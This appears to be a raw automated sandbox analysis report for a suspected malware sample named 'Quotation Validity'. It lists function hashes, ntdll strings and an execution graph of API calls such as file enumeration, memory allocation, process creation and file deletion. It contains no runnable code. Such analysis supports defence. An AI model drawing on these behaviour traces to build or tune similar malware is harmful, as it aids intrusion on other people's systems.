                                                                                • Opcode Fuzzy Hash: 3942ffd15df251c24aad7edeea7c3563818433d7461aae7dedbab0ae3feb0fc5
                                                                                • Instruction Fuzzy Hash: 5E90022960140502E101715D4404616100A97D0645F95C066A1024555ECA268F96A331
                                                                                Function 013B2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1a0b9796b53093a1ea41a426cb185529fbbdb045d3e040aa80aad98a7e379f64
                                                                                • Instruction ID: 25e92640c7ec429a727d728dba76e93c260be3704ce49553b0424805c391d6eb
                                                                                • Opcode Fuzzy Hash: 1a0b9796b53093a1ea41a426cb185529fbbdb045d3e040aa80aad98a7e379f64
                                                                                • Instruction Fuzzy Hash: 2690026920180403E140755D4804607100597D0706F55C055A2064555ECA2A8E556335
                                                                                Function 013B2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                • Instruction ID: 5e4b9ed425e78e9d4f9fa5d026213c5a7054995352ee7e79d516070647f4a34f
                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 013B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 4e35387fa978fd96ca4166a3c78cd4c19d84acd3dabbaf85bf1e283b9ad30827
                                                                                • Instruction ID: ef8234b562f9e76432e4097d15945faa92636b6e122c0a4df3f0652571616745
                                                                                • Opcode Fuzzy Hash: 4e35387fa978fd96ca4166a3c78cd4c19d84acd3dabbaf85bf1e283b9ad30827
                                                                                • Instruction Fuzzy Hash: C251EEB5A00156BFCB11DB9C88D45BFFBF8BB482487148229F5A9D7A41E334EE5087D0
                                                                                Function 013A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013E4742
                                                                                • ExecuteOptions, xrefs: 013E46A0
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013E4655
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 013E4725
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013E46FC
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 013E4787
                                                                                • Execute=1, xrefs: 013E4713
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 0-484625025
                                                                                • Opcode ID: 5d1f78a4a52a6c5c12f9615e79cd43d5b50be087330b47cf597c95107c68e556
                                                                                • Instruction ID: aec7f000751effca7ba252c01e50a0d3fdeff0ab355a04d1e41e9b211366625e
                                                                                • Opcode Fuzzy Hash: 5d1f78a4a52a6c5c12f9615e79cd43d5b50be087330b47cf597c95107c68e556
                                                                                • Instruction Fuzzy Hash: 3351FB356002197AEF21EBA8DCC9FF977BCEF1871CF440099D605A72A1E7729A458F50
                                                                                Function 013BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-$0$0
                                                                                • API String ID: 1302938615-699404926
                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction ID: c591cae41ccde1842495be059f2e40a8500ca12c715a50f0d1eced1382f7a2a4
                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction Fuzzy Hash: 4181C270E052499EEF258E6CC8D17FEFFA1AF45328F18411ADA51A7A99EF348840C751
                                                                                Function 013ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 013E7B7F
                                                                                • RTL: Re-Waiting, xrefs: 013E7BAC
                                                                                • RTL: Resource at %p, xrefs: 013E7B8E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 0-871070163
                                                                                • Opcode ID: 61aa097eb985094c7237c2bec197c94a1fd9068fcf45ea0350f82bd7984adb24
                                                                                • Instruction ID: 241d7e67fe723fd8b823cb1358c142d9e610328b0e20783126ea29897db01fea
                                                                                • Opcode Fuzzy Hash: 61aa097eb985094c7237c2bec197c94a1fd9068fcf45ea0350f82bd7984adb24
                                                                                • Instruction Fuzzy Hash: 6D41E3353007079FDB20CE29C840B6AB7E9EF98718F540A1DFA5A9B780DB71E8058B91
                                                                                Function 013AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013E728C
                                                                                Strings
                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 013E7294
                                                                                • RTL: Re-Waiting, xrefs: 013E72C1
                                                                                • RTL: Resource at %p, xrefs: 013E72A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-605551621
                                                                                • Opcode ID: a72e9239139807eee8ebfe36ffed788fa10b5a1e22f2568de09d544f1512c1bf
                                                                                • Instruction ID: c5aa28d3ef3b7aad9310203840ee0a26994764182245db86eef1cac32deca366
                                                                                • Opcode Fuzzy Hash: a72e9239139807eee8ebfe36ffed788fa10b5a1e22f2568de09d544f1512c1bf
                                                                                • Instruction Fuzzy Hash: 7541D035600316ABD721DE29CC41F6ABBE9FB54718F100619FD55AB680DB31F84287D1
                                                                                Function 013B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction ID: 2461ee7ba620245fc28a03fed517be43a3545d39dd303473da4b97cb4b7ec675
                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction Fuzzy Hash: 0891A071E0020A9AEB24DF6DC8C16FEBBA5EFC4768F14451AEB55E7AC0F73089418B15
                                                                                Function 01379126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$@
                                                                                • API String ID: 0-1194432280
                                                                                • Opcode ID: 323d8e71374cd41207d4e35646051e76ad9fc1bf983438de5528194d63f833fb
                                                                                • Instruction ID: 412de7f0294dbb6c6e4383f241da05351b8d4444495c828b8b409ee6c83b61f2
                                                                                • Opcode Fuzzy Hash: 323d8e71374cd41207d4e35646051e76ad9fc1bf983438de5528194d63f833fb
                                                                                • Instruction Fuzzy Hash: 5F811C72D00269DBDB35DB58DC44BEAB7B8AB48718F0041DAEA19B7250D7745E84CFA0
                                                                                Function 013FCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 013FCFBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: CallFilterFunc@8
                                                                                • String ID: @$@4rw@4rw
                                                                                • API String ID: 4062629308-2979693914
                                                                                • Opcode ID: 623de3daedcee71667d7b695da2816aca4a394f61df7541b6dafa1a8f9cd5935
                                                                                • Instruction ID: e93290bbede28e7e5155051afa567cbbcf2a29147f3bf3022a0e6a6d6cdb5fb7
                                                                                • Opcode Fuzzy Hash: 623de3daedcee71667d7b695da2816aca4a394f61df7541b6dafa1a8f9cd5935
                                                                                • Instruction Fuzzy Hash: 8941A0B190035ADFDB219FA9C840AAEFBB8FF54B18F10402EEA05DB264D734D905CB61

                                                                                Execution Graph

                                                                                Execution Coverage:2.9%
                                                                                Dynamic/Decrypted Code Coverage:4.3%
                                                                                Signature Coverage:1.6%
                                                                                Total number of Nodes:437
                                                                                Total number of Limit Nodes:71
                                                                                execution_graph 88180 2a5c4e0 88182 2a5c509 88180->88182 88181 2a5c60d 88182->88181 88183 2a5c5b3 FindFirstFileW 88182->88183 88183->88181 88185 2a5c5ce 88183->88185 88184 2a5c5f4 FindNextFileW 88184->88185 88186 2a5c606 FindClose 88184->88186 88185->88184 88186->88181 88187 2a690a0 88188 2a6915a 88187->88188 88190 2a690d2 88187->88190 88189 2a69170 NtCreateFile 88188->88189 88191 2a61a20 88196 2a61a39 88191->88196 88192 2a61ac9 88193 2a61a84 88199 2a6b480 88193->88199 88196->88192 88196->88193 88197 2a61ac4 88196->88197 88198 2a6b480 RtlFreeHeap 88197->88198 88198->88192 88202 2a69720 88199->88202 88201 2a61a94 88203 2a6973a 88202->88203 88204 2a6974b RtlFreeHeap 88203->88204 88204->88201 88207 2a49e36 88208 2a49e0c 88207->88208 88213 2a49e39 88207->88213 88209 2a49e30 88208->88209 88210 2a49e1d CreateThread 88208->88210 88211 2a4a592 88213->88211 88214 2a6b0e0 88213->88214 88215 2a6b106 88214->88215 88220 2a44020 88215->88220 88217 2a6b112 88219 2a6b14b 88217->88219 88223 2a65500 88217->88223 88219->88211 88227 2a53120 88220->88227 88222 2a4402d 88222->88217 88224 2a65562 88223->88224 88226 2a6556f 88224->88226 88245 2a51910 88224->88245 88226->88219 88228 2a5313d 88227->88228 88230 2a53156 88228->88230 88231 2a69e10 88228->88231 88230->88222 88233 2a69e2a 88231->88233 88232 2a69e59 88232->88230 88233->88232 88238 2a68a00 88233->88238 88236 2a6b480 RtlFreeHeap 88237 2a69ed2 88236->88237 88237->88230 88239 2a68a1d 88238->88239 88242 4ea2c0a 88239->88242 88240 2a68a49 88240->88236 88243 4ea2c1f LdrInitializeThunk 88242->88243 88244 4ea2c11 88242->88244 88243->88240 88244->88240 88246 2a5194b 88245->88246 88261 2a57d70 88246->88261 88248 2a51953 88260 2a51c1d 88248->88260 88272 2a6b560 88248->88272 88250 2a51969 88251 2a6b560 RtlAllocateHeap 88250->88251 88252 2a5197a 88251->88252 88253 2a6b560 RtlAllocateHeap 88252->88253 88255 2a51988 88253->88255 88256 2a51a1f 88255->88256 88283 2a56920 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 88255->88283 88275 2a54460 88256->88275 88258 2a51bd2 88279 2a67e40 88258->88279 88260->88226 88262 2a57d9c 88261->88262 88284 2a57c60 88262->88284 88265 2a57de1 88267 2a57dfd 88265->88267 88270 2a693a0 NtClose 88265->88270 88266 2a57dc9 88268 2a57dd4 88266->88268 88290 2a693a0 88266->88290 88267->88248 88268->88248 88271 2a57df3 88270->88271 88271->88248 88298 2a696d0 88272->88298 88274 2a6b57b 88274->88250 88276 2a54484 88275->88276 88277 2a5448b 88276->88277 88278 2a544c0 LdrLoadDll 88276->88278 88277->88258 88278->88277 88280 2a67ea2 88279->88280 88282 2a67eaf 88280->88282 88301 2a51c30 88280->88301 88282->88260 88283->88256 88285 2a57d56 88284->88285 88286 2a57c7a 88284->88286 88285->88265 88285->88266 88293 2a68aa0 88286->88293 88289 2a693a0 NtClose 88289->88285 88291 2a693ba 88290->88291 88292 2a693cb NtClose 88291->88292 88292->88268 88294 2a68abd 88293->88294 88297 4ea35c0 LdrInitializeThunk 88294->88297 88295 2a57d4a 88295->88289 88297->88295 88299 2a696ea 88298->88299 88300 2a696fb RtlAllocateHeap 88299->88300 88300->88274 88303 2a51c50 88301->88303 88317 2a58040 88301->88317 88311 2a521a6 88303->88311 88321 2a61060 88303->88321 88306 2a51e64 88329 2a6c650 88306->88329 88307 2a51cae 88307->88311 88324 2a6c520 88307->88324 88309 2a51e79 88313 2a51ec9 88309->88313 88335 2a50760 88309->88335 88311->88282 88313->88311 88314 2a50760 LdrInitializeThunk 88313->88314 88339 2a57fe0 88313->88339 88314->88313 88315 2a57fe0 LdrInitializeThunk 88316 2a52023 88315->88316 88316->88313 88316->88315 88318 2a5804d 88317->88318 88319 2a58075 88318->88319 88320 2a5806e SetErrorMode 88318->88320 88319->88303 88320->88319 88343 2a6b3f0 88321->88343 88323 2a61081 88323->88307 88325 2a6c536 88324->88325 88326 2a6c530 88324->88326 88327 2a6b560 RtlAllocateHeap 88325->88327 88326->88306 88328 2a6c55c 88327->88328 88328->88306 88330 2a6c5c0 88329->88330 88331 2a6c61d 88330->88331 88332 2a6b560 RtlAllocateHeap 88330->88332 88331->88309 88333 2a6c5fa 88332->88333 88334 2a6b480 RtlFreeHeap 88333->88334 88334->88331 88336 2a5077c 88335->88336 88350 2a69640 88336->88350 88340 2a57ff3 88339->88340 88355 2a68900 88340->88355 88342 2a5801e 88342->88313 88346 2a69510 88343->88346 88345 2a6b421 88345->88323 88347 2a695a8 88346->88347 88349 2a6953e 88346->88349 88348 2a695be NtAllocateVirtualMemory 88347->88348 88348->88345 88349->88345 88351 2a6965a 88350->88351 88354 4ea2c70 LdrInitializeThunk 88351->88354 88352 2a50782 88352->88316 88354->88352 88356 2a68981 88355->88356 88357 2a6892e 88355->88357 88360 4ea2dd0 LdrInitializeThunk 88356->88360 88357->88342 88358 2a689a6 88358->88342 88360->88358 88361 2a55ab0 88362 2a55ae0 88361->88362 88363 2a57fe0 LdrInitializeThunk 88361->88363 88365 2a55b2a 88362->88365 88366 2a55b0c 88362->88366 88367 2a57f60 88362->88367 88363->88362 88368 2a57fa4 88367->88368 88369 2a57fc5 88368->88369 88374 2a686d0 88368->88374 88369->88362 88371 2a57fb5 88372 2a57fd1 88371->88372 88373 2a693a0 NtClose 88371->88373 88372->88362 88373->88369 88375 2a68750 88374->88375 88377 2a686fe 88374->88377 88379 4ea4650 LdrInitializeThunk 88375->88379 88376 2a68775 88376->88371 88377->88371 88379->88376 88380 2a57030 88381 2a57049 88380->88381 88382 2a5709c 88380->88382 88381->88382 88383 2a693a0 NtClose 88381->88383 88389 2a571d4 88382->88389 88391 2a56450 NtClose LdrInitializeThunk LdrInitializeThunk 88382->88391 88384 2a57064 88383->88384 88390 2a56450 NtClose LdrInitializeThunk LdrInitializeThunk 88384->88390 88386 2a571ae 88386->88389 88392 2a56620 NtClose LdrInitializeThunk LdrInitializeThunk 88386->88392 88390->88382 88391->88386 88392->88389 88393 2a5f730 88394 2a5f794 88393->88394 88422 2a561c0 88394->88422 88396 2a5f8ce 88397 2a5f8c7 88397->88396 88429 2a562d0 88397->88429 88399 2a5fa73 88400 2a5f94a 88400->88399 88401 2a5fa82 88400->88401 88433 2a5f510 88400->88433 88402 2a693a0 NtClose 88401->88402 88404 2a5fa8c 88402->88404 88405 2a5f986 88405->88401 88406 2a5f991 88405->88406 88407 2a6b560 RtlAllocateHeap 88406->88407 88408 2a5f9ba 88407->88408 88409 2a5f9c3 88408->88409 88410 2a5f9d9 88408->88410 88411 2a693a0 NtClose 88409->88411 88442 2a5f400 88410->88442 88413 2a5f9cd 88411->88413 88414 2a5f9e7 88446 2a68e60 88414->88446 88416 2a5fa62 88417 2a693a0 NtClose 88416->88417 88418 2a5fa6c 88417->88418 88419 2a6b480 RtlFreeHeap 88418->88419 88419->88399 88420 2a5fa05 88420->88416 88421 2a68e60 LdrInitializeThunk 88420->88421 88421->88420 88423 2a561f3 88422->88423 88424 2a56217 88423->88424 88450 2a68f00 88423->88450 88424->88397 88426 2a5623a 88426->88424 88427 2a693a0 NtClose 88426->88427 88428 2a562ba 88427->88428 88428->88397 88430 2a562f5 88429->88430 88455 2a68d10 88430->88455 88434 2a5f52c 88433->88434 88435 2a54460 LdrLoadDll 88434->88435 88437 2a5f54a 88435->88437 88436 2a5f553 88436->88405 88437->88436 88438 2a54460 LdrLoadDll 88437->88438 88439 2a5f61e 88438->88439 88440 2a54460 LdrLoadDll 88439->88440 88441 2a5f678 88439->88441 88440->88441 88441->88405 88443 2a5f412 CoInitialize 88442->88443 88445 2a5f465 88443->88445 88444 2a5f4fb CoUninitialize 88444->88414 88445->88444 88447 2a68e7a 88446->88447 88460 4ea2ba0 LdrInitializeThunk 88447->88460 88448 2a68eaa 88448->88420 88451 2a68f1d 88450->88451 88454 4ea2ca0 LdrInitializeThunk 88451->88454 88452 2a68f49 88452->88426 88454->88452 88456 2a68d2a 88455->88456 88459 4ea2c60 LdrInitializeThunk 88456->88459 88457 2a56369 88457->88400 88459->88457 88460->88448 88461 2a60030 88462 2a60053 88461->88462 88463 2a54460 LdrLoadDll 88462->88463 88464 2a60077 88463->88464 88465 2a68830 88466 2a688c2 88465->88466 88468 2a6885e 88465->88468 88470 4ea2ee0 LdrInitializeThunk 88466->88470 88467 2a688f3 88470->88467 88476 2a689b0 88477 2a689cd 88476->88477 88480 4ea2df0 LdrInitializeThunk 88477->88480 88478 2a689f5 88480->88478 88481 2a65f70 88482 2a65fca 88481->88482 88484 2a65fd7 88482->88484 88485 2a63980 88482->88485 88486 2a6b3f0 NtAllocateVirtualMemory 88485->88486 88488 2a639be 88486->88488 88487 2a63ace 88487->88484 88488->88487 88489 2a54460 LdrLoadDll 88488->88489 88491 2a63a04 88489->88491 88490 2a63a50 Sleep 88490->88491 88491->88487 88491->88490 88492 2a59aff 88493 2a59b0f 88492->88493 88494 2a59b16 88493->88494 88495 2a6b480 RtlFreeHeap 88493->88495 88495->88494 88497 2a50d3b PostThreadMessageW 88498 2a50d4d 88497->88498 88499 2a58704 88500 2a58714 88499->88500 88502 2a586c1 88500->88502 88503 2a56fb0 88500->88503 88504 2a56fff 88503->88504 88505 2a56fc6 88503->88505 88504->88502 88505->88504 88507 2a56e20 LdrLoadDll 88505->88507 88507->88504 88508 2a4b400 88509 2a6b3f0 NtAllocateVirtualMemory 88508->88509 88510 2a4ca71 88509->88510 88511 2a5ac40 88516 2a5a950 88511->88516 88513 2a5ac4d 88530 2a5a5c0 88513->88530 88515 2a5ac69 88517 2a5a975 88516->88517 88541 2a58250 88517->88541 88520 2a5aac0 88520->88513 88522 2a5aad7 88522->88513 88523 2a5aace 88523->88522 88525 2a5abc5 88523->88525 88560 2a5a010 88523->88560 88527 2a5ac2a 88525->88527 88569 2a5a380 88525->88569 88528 2a6b480 RtlFreeHeap 88527->88528 88529 2a5ac31 88528->88529 88529->88513 88531 2a5a5d6 88530->88531 88534 2a5a5e1 88530->88534 88532 2a6b560 RtlAllocateHeap 88531->88532 88532->88534 88533 2a5a608 88533->88515 88534->88533 88535 2a58250 GetFileAttributesW 88534->88535 88536 2a5a922 88534->88536 88539 2a5a010 RtlFreeHeap 88534->88539 88540 2a5a380 RtlFreeHeap 88534->88540 88535->88534 88537 2a6b480 RtlFreeHeap 88536->88537 88538 2a5a93b 88536->88538 88537->88538 88538->88515 88539->88534 88540->88534 88542 2a58271 88541->88542 88543 2a58283 88542->88543 88544 2a58278 GetFileAttributesW 88542->88544 88543->88520 88545 2a63270 88543->88545 88544->88543 88546 2a63285 88545->88546 88547 2a6327e 88545->88547 88548 2a54460 LdrLoadDll 88546->88548 88547->88523 88549 2a632ba 88548->88549 88550 2a632c9 88549->88550 88573 2a62d30 LdrLoadDll 88549->88573 88552 2a6b560 RtlAllocateHeap 88550->88552 88556 2a63474 88550->88556 88553 2a632e2 88552->88553 88554 2a6346a 88553->88554 88553->88556 88558 2a632fe 88553->88558 88555 2a6b480 RtlFreeHeap 88554->88555 88554->88556 88555->88556 88556->88523 88557 2a6b480 RtlFreeHeap 88559 2a6345e 88557->88559 88558->88556 88558->88557 88559->88523 88561 2a5a036 88560->88561 88574 2a5da50 88561->88574 88563 2a5a0a8 88565 2a5a230 88563->88565 88567 2a5a0c6 88563->88567 88564 2a5a215 88564->88523 88565->88564 88566 2a59ed0 RtlFreeHeap 88565->88566 88566->88565 88567->88564 88579 2a59ed0 88567->88579 88570 2a5a3a6 88569->88570 88571 2a5da50 RtlFreeHeap 88570->88571 88572 2a5a42d 88571->88572 88572->88525 88573->88550 88576 2a5da74 88574->88576 88575 2a5da81 88575->88563 88576->88575 88577 2a6b480 RtlFreeHeap 88576->88577 88578 2a5dac4 88577->88578 88578->88563 88580 2a59eed 88579->88580 88583 2a5dae0 88580->88583 88582 2a59ff3 88582->88567 88584 2a5db04 88583->88584 88585 2a5dbae 88584->88585 88586 2a6b480 RtlFreeHeap 88584->88586 88585->88582 88586->88585 88587 2a521c0 88588 2a521f6 88587->88588 88589 2a68a00 LdrInitializeThunk 88587->88589 88592 2a69440 88588->88592 88589->88588 88591 2a5220b 88593 2a694cf 88592->88593 88595 2a6946b 88592->88595 88597 4ea2e80 LdrInitializeThunk 88593->88597 88594 2a69500 88594->88591 88595->88591 88597->88594 88598 2a6c580 88599 2a6b480 RtlFreeHeap 88598->88599 88600 2a6c595 88599->88600 88606 2a69300 88607 2a69377 88606->88607 88609 2a6932b 88606->88609 88608 2a6938d NtDeleteFile 88607->88608 88610 2a52242 88611 2a52202 88610->88611 88613 2a5220b 88610->88613 88612 2a69440 LdrInitializeThunk 88611->88612 88612->88613 88614 2a57289 88615 2a5728e 88614->88615 88616 2a57232 88614->88616 88617 2a5727f 88616->88617 88619 2a5b170 88616->88619 88620 2a5b196 88619->88620 88621 2a5b3c6 88620->88621 88646 2a697b0 88620->88646 88621->88617 88623 2a5b20c 88623->88621 88624 2a6c650 2 API calls 88623->88624 88625 2a5b22b 88624->88625 88625->88621 88626 2a5b2ff 88625->88626 88627 2a68a00 LdrInitializeThunk 88625->88627 88628 2a55a30 LdrInitializeThunk 88626->88628 88630 2a5b31e 88626->88630 88629 2a5b28a 88627->88629 88628->88630 88629->88626 88634 2a5b293 88629->88634 88633 2a5b3ae 88630->88633 88652 2a68570 88630->88652 88631 2a5b2e7 88632 2a57fe0 LdrInitializeThunk 88631->88632 88639 2a5b2f5 88632->88639 88638 2a57fe0 LdrInitializeThunk 88633->88638 88634->88621 88634->88631 88635 2a5b2c5 88634->88635 88649 2a55a30 88634->88649 88667 2a64690 LdrInitializeThunk 88635->88667 88641 2a5b3bc 88638->88641 88639->88617 88641->88617 88642 2a5b385 88657 2a68620 88642->88657 88644 2a5b39f 88662 2a68780 88644->88662 88647 2a697cd 88646->88647 88648 2a697de CreateProcessInternalW 88647->88648 88648->88623 88650 2a55a6e 88649->88650 88668 2a68bd0 88649->88668 88650->88635 88653 2a685f0 88652->88653 88654 2a6859e 88652->88654 88674 4ea39b0 LdrInitializeThunk 88653->88674 88654->88642 88655 2a68615 88655->88642 88658 2a686a0 88657->88658 88659 2a6864e 88657->88659 88675 4ea4340 LdrInitializeThunk 88658->88675 88659->88644 88660 2a686c5 88660->88644 88663 2a687fd 88662->88663 88664 2a687ab 88662->88664 88676 4ea2fb0 LdrInitializeThunk 88663->88676 88664->88633 88665 2a68822 88665->88633 88667->88631 88669 2a68c84 88668->88669 88671 2a68c02 88668->88671 88673 4ea2d10 LdrInitializeThunk 88669->88673 88670 2a68cc9 88670->88650 88671->88650 88673->88670 88674->88655 88675->88660 88676->88665 88677 2a52688 88678 2a5269f 88677->88678 88679 2a561c0 2 API calls 88678->88679 88680 2a526b3 88679->88680 88681 2a56c90 88682 2a56cba 88681->88682 88685 2a57e10 88682->88685 88684 2a56ce1 88686 2a57e2d 88685->88686 88692 2a68af0 88686->88692 88688 2a57e84 88688->88684 88689 2a57e7d 88689->88688 88690 2a68bd0 LdrInitializeThunk 88689->88690 88691 2a57ead 88690->88691 88691->88684 88693 2a68b8b 88692->88693 88695 2a68b1b 88692->88695 88697 4ea2f30 LdrInitializeThunk 88693->88697 88694 2a68bc4 88694->88689 88695->88689 88697->88694 88698 2a61690 88699 2a616ac 88698->88699 88700 2a616d4 88699->88700 88701 2a616e8 88699->88701 88702 2a693a0 NtClose 88700->88702 88703 2a693a0 NtClose 88701->88703 88704 2a616dd 88702->88704 88705 2a616f1 88703->88705 88708 2a6b5a0 RtlAllocateHeap 88705->88708 88707 2a616fc 88708->88707 88714 2a69210 88715 2a692b7 88714->88715 88717 2a6923b 88714->88717 88716 2a692cd NtReadFile 88715->88716 88718 2a53013 88719 2a57c60 2 API calls 88718->88719 88721 2a53023 88719->88721 88720 2a5303f 88721->88720 88722 2a693a0 NtClose 88721->88722 88722->88720 88723 4ea2ad0 LdrInitializeThunk

                                                                                Executed Functions

                                                                                Function 02A49E40 Relevance: 26.6, Strings: 21, Instructions: 384COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
